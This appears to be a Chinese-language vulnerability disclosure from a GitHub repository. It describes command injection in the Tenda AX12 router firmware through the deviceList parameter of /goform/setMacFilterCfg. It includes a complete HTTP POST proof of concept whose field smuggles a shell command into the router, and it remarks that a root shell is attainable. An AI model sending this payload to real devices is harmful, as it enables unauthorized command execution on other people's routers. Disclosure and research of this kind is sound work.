Skip to content

Latest commit

 

History

History

AX12

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

Tenda AX12存在命令注入漏洞

写在前面

Tenda官网:https://www.tenda.com.cn/default.html

关于Tenda:https://www.tenda.com.cn/profile/contact.html

固件下载:https://www.tenda.com.cn/download/

影响版本

image-20220331093431847

图中显示了最新版本

漏洞细节

image-20220331092543609

image-20220331092601048

image-20220331093247556

程序通过deviclist参数获取到的内容传递给v3,之后将v3带入doyststem函数,没有进行命令的过滤,存在命令注入漏洞。

漏洞复现与POC

为了重现该漏洞,可以遵循以下步骤:

​ 1.使用fat模拟固件V22.03.01.21_cn

​ 2.使用以下POC攻击进行攻击

POST /goform/setMacFilterCfg HTTP/1.1
Host: 192.168.11.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 51
Origin: http://192.168.11.1
Connection: close
Referer: http://192.168.11.1/iptv.html?random=0.7642888131213508&
Cookie: password=7c90ed4e4d4bf1e300aa08103057ccbcmho1qw

macFilterType=1&deviceList=1"echo 1234 > /tmp/4455 \"\

image-20220331093607433

图为POC攻击效果图

最后,您可以编写exp,这可以实现获取根shell的非常稳定的效果

image-20220330135459526